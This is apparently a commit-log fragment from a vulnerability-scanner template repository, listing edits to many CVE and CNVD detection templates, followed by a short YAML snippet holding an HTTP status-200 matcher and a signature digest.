cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
- type: status
status:
- 200
# digest: 490a004630440220727f7f1d4cfd375a3ba1158e8be31cafa17954a82bc49b20ea7fd5bad23b104502203f473da2a6ab0732a6e53d026571bd3babe1135bc80a1c1258ea1be5e3bc9578:922c64590222798bb761d5b6d8e72950